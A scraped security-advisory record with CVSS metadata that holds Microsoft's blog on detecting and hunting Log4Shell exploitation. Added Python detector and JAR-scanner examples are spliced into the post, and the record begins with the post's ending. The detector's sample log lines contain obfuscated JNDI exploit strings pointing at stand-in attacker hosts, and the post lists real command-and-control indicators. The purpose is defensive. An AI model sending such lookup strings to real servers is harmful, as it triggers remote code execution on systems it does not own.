**Recommendation**: We recommend that customers enable a WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2, to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.

_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1_

_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_

Note: The above protection is also available on the Default Rule Set (DRS) 2.0 preview version and the OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.

More information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).

## Indicators of compromise (IOCs)

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)

Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.

#### Revision history

**[01/19/2022]** _New information about an unrelated vulnerability we discovered while investigating Log4j attacks_

**[01/11/2022]** _New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries_

**[01/10/2022]** _Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_

**[01/07/2022]** _Added a new rule group in Azure Web Application Firewall (WAF)_

**[12/27/2021]** _New capabilities in threat and vulnerability management including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution._

**[12/22/2021]** _Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365._

**[12/21/2021]** _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal._

**[12/17/2021]** _New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries._

**[12/16/2021]** _New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections._

**[12/15/2021]** _Details about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management._

**[12/14/2021]** _New insights about multiple threat actors taking advantage of this vulnerability, including nation-state actors and access brokers linked to ransomware._

The post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).

", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T05:29:03", "type": "mssecure", "title": "Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-35247", "CVE-2021-44228", "CVE-2021-4428", "CVE-2021-44428", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-12T05:29:03", "id": "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "href": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-01-19T21:30:14", "description": "

**January 10, 2022 recap** – _The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers' software and services.
By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._

_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends that customers do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._

**January 19, 2022 update** – _We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._

The remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as "Log4Shell" ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) have presented a new attack vector and gained broad attention due to their severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it's highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.

With nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.

Meanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.

This blog covers the following topics:

 1. **Attack vectors and observed activity**
 2. **Finding and remediating vulnerable apps and systems**
    * Threat and vulnerability management
    * Discovering affected components, software, and devices via a unified Log4j dashboard
    * Applying mitigation directly in the Microsoft 365 Defender portal
    * Microsoft 365 Defender advanced hunting
    * Microsoft Defender for Cloud
    * Microsoft Defender for servers
    * Microsoft Defender for Containers
    * Microsoft Sentinel queries
    * RiskIQ EASM and Threat Intelligence
 3. **Detecting and responding to exploitation attempts and other related attacker activity**
    * Microsoft 365 Defender
    * Microsoft Defender Antivirus
    * Microsoft Defender for Endpoint
    * Microsoft Defender for Cloud Apps
    * Microsoft Defender for Office 365
    * Microsoft 365 Defender advanced hunting
    * Microsoft Defender for Cloud
    * Microsoft Defender for IoT
    * Microsoft Sentinel
    * Microsoft Sentinel queries
    * Azure Firewall Premium
    * Azure Web Application Firewall (WAF)
 4. **Indicators of compromise (IoCs)**

## Attack vectors and observed activity

Microsoft's unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, has been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as "Log4Shell".

The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to fingerprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:

An attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.

The specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains "jndi", which refers to the Java Naming and Directory Interface. Following this, the protocol, such as "ldap", "ldaps", "rmi", "dns", "iiop", or "http", precedes the attacker domain.

As security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We've seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:

The vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives.
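As an added illustration of the detection problem described above (this is not code from the Microsoft post, nor any Microsoft or Sentinel query), the following Python scans web-request log lines for the crafted lookup string. It collapses the nested `lower`/`upper` and `${...:-default}` obfuscations from the inside out so that the literal `jndi:` token and its protocol surface for a plain string match, records the protocol and target host for IOC pivoting, and, mirroring what the Azure WAF query above does when it "decodes the malicious command", decodes a Base64 segment where one is present. The log lines, hostnames, addresses and the `Base64/` path convention are constructed for the example and are not observed indicators.

```python
"""Added example (not code from the Microsoft post): detect Log4Shell-style
lookup strings in web-request log lines, including the nested lower/upper/default
obfuscations described above. All log lines, hostnames and payloads are
constructed samples, not captured traffic."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Innermost lookup: a ${...} whose body contains no further '$', '{' or '}'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# ${lower:x} / ${upper:x} evaluate to x with its case changed; case does not
# matter for a case-insensitive match, so both collapse to x.
_CASE_LOOKUP = re.compile(r"^(?:lower|upper):(.*)$", re.IGNORECASE | re.DOTALL)
# After normalization the literal token surfaces: ${jndi:<protocol>://<target>...
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|https?)\s*:\s*//\s*([^/\s}]+)",
    re.IGNORECASE,
)
# Assumed convention for the sample: a Base64 segment after a "Base64/" path element.
_B64_SEGMENT = re.compile(r"Base64/([A-Za-z0-9+/=]{8,})")


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse nested ${lower:..}, ${upper:..} and ${..:-default} lookups from the
    inside out, leaving any other lookup (such as the jndi one) untouched."""
    for _ in range(max_rounds):
        changed = False

        def collapse(match):
            nonlocal changed
            body = match.group(1)
            case_match = _CASE_LOOKUP.match(body)
            if case_match:
                changed = True
                return case_match.group(1)
            if ":-" in body:  # ${key:-default} with an undefined key yields default
                changed = True
                return body.split(":-", 1)[1]
            return match.group(0)

        text = _INNERMOST.sub(collapse, text)
        if not changed:
            break
    return text


def decode_embedded_base64(text: str) -> Optional[str]:
    """Decode a Base64 path segment for analyst review; None if absent or not text."""
    match = _B64_SEGMENT.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    line: str                       # original log line
    protocol: str                   # jndi protocol, lower-cased
    target: str                     # host[:port] the victim would be made to contact
    obfuscated: bool                # True if nested lookups had to be collapsed
    decoded_payload: Optional[str]  # decoded Base64 segment, if any


def scan_request_log(lines: List[str]) -> List[Finding]:
    """Return one Finding per log line that carries a jndi lookup string."""
    findings = []
    for line in lines:
        normalized = normalize_lookups(line)
        match = _JNDI.search(normalized)
        if not match:
            continue
        findings.append(Finding(
            line=line,
            protocol=match.group(1).lower(),
            target=match.group(2),
            obfuscated=normalized != line,
            decoded_payload=decode_embedded_base64(normalized),
        ))
    return findings


# Constructed sample log lines (RFC 5737 addresses, .example hostnames).
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Dec/2021:02:14:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [11/Dec/2021:02:14:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://scanner.example.net/a}"',
    '198.51.100.9 - - [11/Dec/2021:02:14:09 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:rmi}://c2.example.org:1099/obj} HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.10 - - [11/Dec/2021:02:14:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://loader.example.org/'
    'Base64/ZWNobyBjb25zdHJ1Y3RlZC1zYW1wbGU=}"',
]

if __name__ == "__main__":
    for f in scan_request_log(SAMPLE_LOG):
        print(f"{f.protocol:5} {f.target:25} obfuscated={f.obfuscated} payload={f.decoded_payload!r}")
```

Matching only on the literal `jndi:ldap` substring misses the second and third malicious lines; normalizing first catches all three while leaving the benign request alone. The `obfuscated` flag is itself a useful triage signal, since legitimate clients have no reason to send nested lookups.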
Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.

### Exploitation continues on non-Microsoft hosted Minecraft servers

Minecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.

Microsoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mod loader.

In these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.

While it's uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.

Due to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.

### Nation-state activity

MSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor's objectives.

For example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.

In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.

### Access brokers associated with ransomware

MSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.

### Mass scanning activity continues

The vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JNDI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.

Microsoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.

### Additional RAT payloads

We've observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we've also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.

This activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44228 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.

### Webtoos

The Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. Attackers' use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.

### A note on testing services and assumed benign activity

While services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.

### Exploitation in internet-facing systems leads to ransomware

As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.

These attacks are performed by a China-based ransomware operator that we're tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).

Based on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.

### Attackers propagating Log4j attacks via previously undisclosed vulnerability

During our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitization.

We reported our discovery to SolarWinds, and we'd like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend that affected customers apply the released security updates by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>.

Microsoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.

## Finding and remediating vulnerable apps and systems

### Threat and vulnerability management

[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization's overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.

#### Discovering affected components, software, and devices via a unified Log4j dashboard

Threat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.

The wide use of Log4j across many suppliers' products challenges defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities (on the device, software, and vulnerable component level) through a range of automated, complementary capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later.
The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. 
Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** > **Dashboard** > **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. 
These new capabilities provide security teams with the following:

1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.

To use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.

_Figure 6. Viewing each device’s mitigation status_

2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.

The mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):

You can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.

_Figure 7. Creating mitigation actions for exposed devices._

In cases where the mitigation needs to be reverted, follow these steps:

1. Open an elevated PowerShell window
2. Run the following command:

        [Environment]::SetEnvironmentVariable("LOG4J_FORMAT_MSG_NO_LOOKUPS", $null, [EnvironmentVariableTarget]::Machine)

The change will take effect after the device restarts.

### Microsoft 365 Defender advanced hunting

Advanced hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component.
Triage the results to determine applications and programs that may need to be patched and updated.

    DeviceTvmSoftwareInventory
    | where SoftwareName contains "log4j"
    | project DeviceName, SoftwareName, SoftwareVersion

_Figure 8. Finding vulnerable software via advanced hunting_

### Microsoft Defender for Cloud

#### Microsoft Defender for servers

Organizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there’s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:

* Vulnerability assessment findings – Organizations that have enabled any of the vulnerability assessment tools (whether it's Microsoft Defender for Endpoint's [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)) can search by CVE identifier:

_Figure 9. Searching vulnerability assessment findings by CVE identifier_

* Software inventory – With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:

_Figure 10. Searching software inventory by installed applications_

Note that this doesn’t replace a search of your codebase.
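As an added example that is not part of the original post, the following Python scanner shows what such a search of the artifacts on disk looks like: it opens JAR, WAR and EAR files, descends one level into nested archives as found in an Uber-JAR, and reports each archive that ships the JndiLookup class together with the log4j-core version read from its pom.properties. The function names, the sample nested JAR (built in memory) and its 2.14.1 version string are all constructed for this example.

```python
import io
import zipfile
from pathlib import Path

# Marker class of a Log4j 2 core JAR with JNDI lookup support, and the Maven
# metadata file that log4j-core ships (used here to read the library version).
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear", ".zip")

def scan_jar_bytes(data, name, depth=0, max_depth=1):
    """Yield (path, version) for each archive in `data` that ships JndiLookup.class.
    Nested archives (Uber-JAR, WAR, EAR) are opened up to `max_depth` levels down.
    Shaded builds relocate the package, so a class-path check like this misses them."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a ZIP container at all; nothing to report
    with zf:
        names = zf.namelist()
        if JNDI_LOOKUP in names:
            version = "unknown"
            if POM_PROPS in names:
                props = zf.read(POM_PROPS).decode("utf-8", "replace").splitlines()
                version = next((l.split("=", 1)[1].strip() for l in props
                                if l.startswith("version=")), "unknown")
            yield (name, version)
        if depth >= max_depth:
            return
        for inner in names:  # descend into bundled archives, e.g. BOOT-INF/lib/*.jar
            if inner.lower().endswith(ARCHIVES):
                yield from scan_jar_bytes(zf.read(inner), f"{name}!{inner}", depth + 1, max_depth)

def scan_tree(root, max_depth=1):
    """Walk `root` on disk and collect findings for every archive file beneath it."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in ARCHIVES:
            findings.extend(scan_jar_bytes(p.read_bytes(), str(p), 0, max_depth))
    return findings

def build_sample_uber_jar():
    """Constructed sample: a log4j-core 2.14.1 JAR nested inside an application JAR."""
    core, app = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(core, "w") as zf:
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder class bytes
        zf.writestr(POM_PROPS, "version=2.14.1\nartifactId=log4j-core\n")
    with zipfile.ZipFile(app, "w") as zf:
        zf.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
        zf.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
    return app.getvalue()
```

Running `scan_tree("/opt/apps")` lists every hit under that directory as `path!inner-archive` with its version; `list(scan_jar_bytes(build_sample_uber_jar(), "app.jar"))` shows the nested sample being found at one level of nesting.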
It’s possible that software with integrated Log4j libraries won’t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).

#### Microsoft Defender for Containers

Microsoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>).

